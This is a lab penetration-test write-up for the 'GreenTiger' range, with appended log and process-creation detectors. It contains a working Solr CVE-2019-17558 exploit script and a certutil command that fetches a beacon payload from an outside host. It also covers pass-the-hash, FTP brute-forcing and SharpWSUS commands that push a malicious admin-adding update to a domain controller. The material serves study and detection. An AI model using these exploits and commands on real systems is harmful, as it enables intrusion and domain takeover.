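Article summary: This article documents the complete penetration test of the internal-network simulation lab "GreenTiger". The attacker first finds with an nmap scan that the target host runs Apache Solr 8.2.0, exploits CVE-2019-17558 to get an initial shell and uploads a trojan; the attacker then moves laterally through the internal network, finds JBoss and exploits a deserialization vulnerability to get SYSTEM privileges, and finally obtains the flag. The document provides the specific exploit code and commands and has practical guidance value. Overall score: 82 Categories: penetration testing, internal-network penetration, red team, web security, vulnerability analysis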
Internal-Network Simulation Lab "GreenTiger" Write-up
Original
plag plag
红队蓝军
June 22, 2026, 18:00, Sichuan
# First host: entry web server
Start with a scan:
```
nmap -A 172.5.5.5
Starting Nmap 7.95 ( https://nmap.org )
Nmap scan report for 172.5.5.5
Host is up (0.058s latency).
Not shown: 995 filtered tcp ports (no-response)
PORT     STATE SERVICE       VERSION
80/tcp   open  http          Apache Solr
| http-title: Solr Admin
|_Requested resource was http://172.5.5.5/solr/
135/tcp  open  msrpc         Microsoft Windows RPC
139/tcp  open  netbios-ssn   Microsoft Windows netbios-ssn
445/tcp  open  microsoft-ds?
5985/tcp open  http          Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-title: Not Found
|_http-server-header: Microsoft-HTTPAPI/2.0
Service Info: OS: Windows; CPE: cpe:/o:microsoft:windows

Host script results:
|_clock-skew: -8h00m00s
| smb2-time:
|   date: 2025-07-01T19:20:13
|_  start_date: N/A
| smb2-security-mode:
|   3:1:1:
|_    Message signing enabled but not required

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 113.00 seconds
```
Browsing to 172.5.5.5 shows Apache Solr, version 8.2.0.

Look up the known vulnerabilities for this version.

Use the CVE-2019-17558 exploit directly to get a shell:
```python
#!/usr/bin/python3
# -*- coding:utf-8 -*-
# author:zhzyker
# from:https://github.com/zhzyker/exphub
# telegram:t.me/zhzyker

import requests
import sys
import json

if len(sys.argv) != 2:
    print('+------------------------------------------------------------+')
    print('+ DES: by zhzyker as https://github.com/zhzyker/exphub +')
    print('+ Apache Solr Velocity Commons Remote Code Execution +')
    print('+------------------------------------------------------------+')
    # print('+ USE: python3 cve-2019-17558_cmd.py
    # [The listing is cut off here on the source page: the rest of the usage
    #  banner and the lines that define `url` and `corename` are missing.]

# Enable the Velocity response writer through the Config API.
apiurl = url + "/solr/" + corename + "/config"
headers = {"Content-Type": "application/json"}
setapidata = """
{
  "update-queryresponsewriter": {
    "startup": "lazy",
    "name": "velocity",
    "class": "solr.VelocityResponseWriter",
    "template.base.dir": "",
    "solr.resource.loader.enabled": "true",
    "params.resource.loader.enabled": "true"
  }
}
"""
api = requests.request("POST", url=apiurl, data=setapidata, headers=headers)
code = str(api.status_code)
if api.status_code == 200:
    # print("[+]
    # [The listing is cut off here on the source page.]
    pass

def do_exp(cmd):
    # Send the command inside a request-supplied Velocity template.
    vulnurl = url + "/solr/" + corename + "/select?q=1&&wt=velocity&v.template=custom&v.template.custom=%23set($x=%27%27)+%23set($rt=$x.class.forName(%27java.lang.Runtime%27))+%23set($chr=$x.class.forName(%27java.lang.Character%27))+%23set($str=$x.class.forName(%27java.lang.String%27))+%23set($ex=$rt.getRuntime().exec(%27" + cmd + "%27))+$ex.waitFor()+%23set($out=$ex.getInputStream())+%23foreach($i+in+[1..$out.available()])$str.valueOf($chr.toChars($out.read()))%23end"
    r = requests.request("GET", vulnurl)
    print(r.text)

while 1:
    cmd = input("Shell >>> ")
    if cmd == "exit":
        exit(0)
    do_exp(cmd)
```

```
python3 cve-2019-17558_cmd.py http://172.5.5.5
```

Download the payload with certutil, run it, and get a session:

```
certutil -urlcache -split -f http://172.16.233.2/beacon.exe 1.exe
```

Get the flag.
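The Solr step above leaves a recognisable trail in HTTP request logs: a write to the core's Config API followed by a `select` request that carries its own Velocity template. The detector below is an added example, not part of the original write-up; it assumes NCSA-style access logs that record the query string, and the log lines, IP addresses and core name `demo` are constructed. A POST body is not visible in such logs, so the Config API write is only marked for review.

```python
import re
from urllib.parse import urlsplit, parse_qs

# Constructed NCSA-style access-log lines; the IPs and the core name "demo" are made up.
SAMPLE_LOG = """\
10.0.0.7 - - [01/Jul/2025:19:21:03 +0000] "POST /solr/demo/config HTTP/1.1" 200 149
10.0.0.7 - - [01/Jul/2025:19:21:04 +0000] "GET /solr/demo/select?q=1&&wt=velocity&v.template=custom&v.template.custom=%23set($x=%27%27)+%23set($rt=$x.class.forName(%27java.lang.Runtime%27)) HTTP/1.1" 200 88
10.0.0.9 - - [01/Jul/2025:19:25:40 +0000] "GET /solr/demo/select?q=title%3Atiger&wt=json HTTP/1.1" 200 2048
10.0.0.9 - - [01/Jul/2025:19:26:10 +0000] "POST /solr/demo/update?commit=true HTTP/1.1" 200 60
10.0.0.4 - - [01/Jul/2025:19:30:00 +0000] "GET /solr/demo/select?q=1&wt=velocity&v.template.t=%23set($a=1)$a HTTP/1.1" 200 5
"""

LINE_RE = re.compile(r'^(\S+) \S+ \S+ \[[^\]]+\] "([A-Z]+) (\S+) [^"]*" (\d{3})')
CORE_RE = re.compile(r"^/solr/([^/]+)/(config|select)$")
# Java reflection / process-execution markers inside a request-supplied template.
DANGEROUS_RE = re.compile(r"class\.forName|java\.lang\.|getRuntime|\.exec\(", re.I)


def scan(log_text):
    """Return (ip, core, severity, reason) findings for Velocity-template abuse."""
    findings = []
    config_writers = set()          # (ip, core) pairs that POSTed to the Config API
    for line in log_text.splitlines():
        m = LINE_RE.match(line)
        if not m:
            continue
        ip, method, target, _status = m.groups()
        url = urlsplit(target)
        core = CORE_RE.match(url.path)
        if not core:
            continue
        name, endpoint = core.groups()
        if endpoint == "config":
            if method == "POST":
                config_writers.add((ip, name))
                findings.append((ip, name, "review", "Config API write"))
            continue
        params = parse_qs(url.query, keep_blank_values=True)   # URL-decodes values
        if "velocity" not in [v.lower() for v in params.get("wt", [])]:
            continue
        # v.template.<name>=<body> means the template body came from the request.
        inline = [v for k, vs in params.items()
                  if k.startswith("v.template.") for v in vs]
        if not inline:
            continue
        if any(DANGEROUS_RE.search(body) for body in inline):
            severity, reason = "critical", "inline Velocity template uses Java reflection"
        else:
            severity, reason = "high", "inline Velocity template in request"
        if (ip, name) in config_writers:
            reason += " after Config API write from same source"
        findings.append((ip, name, severity, reason))
    return findings


if __name__ == "__main__":
    for finding in scan(SAMPLE_LOG):
        print(finding)
```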

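# Internal web
Information gathering shows the host has two network interfaces.

A port scan finds a live IP, 172.6.6.8, with the characteristic port 8080 open.

Browsing to it shows JBoss.

Scanning JBoss for known vulnerabilities finds a JBoss deserialization flaw, which gives SYSTEM privileges.

Check whether the host is running any AV: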
```
映像名称                       PID 服务
========================= ======== ============================================
System Idle Process              0 暂缺
System                           4 暂缺
smss.exe                       244 暂缺
csrss.exe                      332 暂缺
csrss.exe                      416 暂缺
wininit.exe                    432 暂缺
winlogon.exe                   464 暂缺
services.exe                   532 暂缺
lsass.exe                      540 KeyIso, Netlogon, SamSs, VaultSvc
svchost.exe                    612 BrokerInfrastructure, DcomLaunch, LSM, PlugPlay, Power, SystemEventsBroker
svchost.exe                    664 RpcEptMapper, RpcSs
dwm.exe                        744 暂缺
svchost.exe                    776 DsmSvc, gpsvc, IKEEXT, iphlpsvc, ProfSvc, Schedule, seclogon, SENS, ShellHWDetection, Themes, UserManager, Winmgmt, WpnService, wuauserv
svchost.exe                    848 Dhcp, EventLog, lmhosts, TimeBrokerSvc
svchost.exe                    856 EventSystem, FontCache, LicenseManager, netprofm, nsi, W32Time, WinHttpAutoProxySvc
svchost.exe                    892 CryptSvc, Dnscache, LanmanWorkstation, NlaSvc, WinRM
svchost.exe                    900 NcbService, PcaSvc, StorSvc, TrkWks, UALSVC, wudfsvc
svchost.exe                     96 BFE, CoreMessagingRegistrar, DPS, MpsSvc
svchost.exe                    588 Wcmsvc
svchost.exe                   1240 Browser, LanmanServer
svchost.exe                   1292 PolicyAgent
spoolsv.exe                   1528 Spooler
svchost.exe                   1628 AppHostSvc
svchost.exe                   1640 ftpsvc
svchost.exe                   1652 DiagTrack
svchost.exe                   1676 StateRepository, tiledatamodelsvc
jbosssvc.exe                  1712 JBAS60SVC
svchost.exe                   1724 W3SVC, WAS
cmd.exe                       1636 暂缺
conhost.exe                   1084 暂缺
java.exe                      2384 暂缺
ChsIME.exe                    2476 暂缺
RuntimeBroker.exe             2676 暂缺
sihost.exe                    2712 暂缺
svchost.exe                   2724 CDPUserSvc24738, OneSyncSvc24738
taskhostw.exe                 2748 暂缺
ChsIME.exe                    2960 暂缺
explorer.exe                   736 暂缺
ShellExperienceHost.exe       2452 暂缺
SearchUI.exe                  3000 暂缺
shutdown.exe                  3336 暂缺
conhost.exe                   3344 暂缺
ServerManager.exe             3536 暂缺
jusched.exe                   3860 暂缺
msdtc.exe                     2408 MSDTC
cmd.exe                       3836 暂缺
conhost.exe                   2472 暂缺
LogonUI.exe                   1044 暂缺
LockAppHost.exe               3452 暂缺
taskhostw.exe                 2332 暂缺
cmd.exe                       2300 暂缺
conhost.exe                   2280 暂缺
tasklist.exe                  3220 暂缺
WmiPrvSE.exe                  2292 暂缺
```
There is no AV, so connect directly over TCP.

Dump the hashes, which yields the domain user `cslabwow : cyber@w0w`.
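# Internal lateral movement
Use Venom to set up a second-layer proxy.

The proxy is exposed on local port 8998.

A port scan finds an FTP service; brute-forcing FTP yields the credentials `admin/qwe!@#123`.

This gives a text file; the password in it is cs1ab@wq.

Convert it to MD5.

Pass the hash directly.

The host comes online.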

# DC
web2 turns out to be the WSUS server:
```
beacon> shell reg query HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\WindowsUpdate
[*] Tasked beacon to run: reg query HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\WindowsUpdate
[+] host called home, sent: 109 bytes
[+] received output:

HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\WindowsUpdate
    WUServer    REG_SZ    http://10.8.8.60:8530
    WUStatusServer    REG_SZ    http://10.8.8.60:8530
    UpdateServiceUrlAlternate    REG_SZ    http://10.8.8.60:8530

HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\WindowsUpdate\AU
```
Create a malicious update that uses psexec to add an account to the local administrators group:
```
SharpWSUS.exe create /payload:"C:\psexec.exe" /args:"-accepteula -s -d cmd.exe /c \"net user WSUSDemo Password123! /add ^&^& net localgroup administrators WSUSDemo /add\"" /title:"WSUSDemo"
```

The updateid is the update ID of the patch.

Create the group Demo Group, add the DC to Demo Group, and approve the malicious update for Demo Group:
```
SharpWSUS.exe approve /updateid:b95933c9-084a-4b66-b3a0-2c2cd38261ed /computername:DC.cyberstrikelab.com /groupname:"Demo Group"

Phil Keeble @ Nettitude Red Team

[*] Action: Approve Update

Targeting dc.cyberstrikelab.com
TargetComputer, ComputerID, TargetID
------------------------------------
dc.cyberstrikelab.com, 824bcb21-c250-4bfc-86f9-c25c3d199d8b, 2
Group Exists = True
Added Computer To Group
Approved Update

[*] Approve complete
```

Check that the group was created:
```
cmd > SharpWSUS.exe inspect

Phil Keeble @ Nettitude Red Team

[*] Action: Inspect WSUS Server

########### WSUS Server Enumeration via SQL ##################
ServerName, WSUSPortNumber, WSUSContentLocation
-----------------------------------------------
WEB2, 8530, c:\WSUS\WsusContent

################# Computer Enumeration #######################
ComputerName, IPAddress, OSVersion, LastCheckInTime
---------------------------------------------------
cyberweb.cyberstrikelab.com, 10.8.8.12, 10.0.14393.2273, 2025/5/24 11:18:05
dc.cyberstrikelab.com, 10.8.8.55, 10.0.14393.2273,
web2.cyberstrikelab.com, 10.8.8.60, 10.0.14393.1794, 2025/6/16 7:39:24

################# Downstream Server Enumeration #######################
ComputerName, OSVersion, LastCheckInTime
---------------------------------------------------

################# Group Enumeration #######################
GroupName
---------------------------------------------------
All Computers
Demo Group
Downstream Servers

[*] Inspect complete
```

Check whether the update has been installed:
```
SharpWSUS.exe check /updateid:b95933c9-084a-4b66-b3a0-2c2cd38261ed /computername:DC.cyberstrikelab.com
```
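Get the update status.
It is also visible in the management console.
After the update is installed, the malicious update has created the local administrator account.
The host comes online.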
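Both host-side command lines used in this write-up, the certutil download on the first host and the `net user` / `net localgroup` payload pushed through WSUS, are visible in process-creation logging. The detector below is an added example, not part of the original write-up; the host names, the record format and the records other than those two command lines are constructed, and the PsExec line is an assumed rendering of the `/payload` and `/args` values shown above.

```python
import re

# Constructed process-creation records (host, command line). The certutil and
# PsExec command lines reuse the arguments shown in the write-up; host names and
# the remaining records are made up for the example.
EVENTS = [
    ("HOST-A", r"certutil -urlcache -split -f http://172.16.233.2/beacon.exe 1.exe"),
    ("HOST-A", r"certutil -hashfile C:\setup.msi SHA256"),
    ("HOST-B", r'C:\psexec.exe -accepteula -s -d cmd.exe /c "net user WSUSDemo '
               r'Password123! /add ^&^& net localgroup administrators WSUSDemo /add"'),
    ("HOST-B", r"net user"),
    ("HOST-C", r'CertUtil.exe /URLCache /f "https://example.invalid/a.txt" a.txt'),
]

CERTUTIL_DL = re.compile(r"\bcertutil(?:\.exe)?\s(?=.*-urlcache\b)(?=.*https?://)")
USER_ADD = re.compile(r"\bnet1?(?:\.exe)?\s+user\s+(\S+)\s+[^&|]*?-add\b")
ADMIN_ADD = re.compile(
    r"\bnet1?(?:\.exe)?\s+localgroup\s+administrators\s+(\S+)\s+[^&|]*?-add\b")
PSEXEC_SYSTEM = re.compile(r"\bpsexec(?:64)?(?:\.exe)?\b(?=.*\s-s\b)")
URL_RE = re.compile(r"https?://[^\s\"]+", re.I)


def normalize(cmdline):
    """Lower-case, drop cmd.exe carets and quotes, map '/switch' to '-switch'."""
    s = cmdline.lower().replace("^", "").replace('"', "")
    return re.sub(r"(?<=\s)/(?=[a-z])", "-", s)


def detect(events):
    """Return (host, rule, detail) findings in event order."""
    findings = []
    created = {}                  # host -> accounts seen in "net user <name> ... /add"
    for host, raw in events:
        cmd = normalize(raw)
        if CERTUTIL_DL.search(cmd):
            findings.append((host, "certutil-download", URL_RE.search(raw).group(0)))
        for user in USER_ADD.findall(cmd):
            created.setdefault(host, set()).add(user)
        for user in ADMIN_ADD.findall(cmd):
            via = "psexec-as-system" if PSEXEC_SYSTEM.search(cmd) else "direct"
            # Created and promoted on the same host: a brand-new local administrator.
            rule = "new-local-admin" if user in created.get(host, ()) else "admin-group-add"
            findings.append((host, rule, f"{user} ({via})"))
    return findings


if __name__ == "__main__":
    for finding in detect(EVENTS):
        print(finding)
```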
Lab address:
https://www.cyberstrikelab.com/#/scene/detail/41
Reposted from: 红队蓝军, plag plag, "Internal-Network Simulation Lab "GreenTiger" Write-up"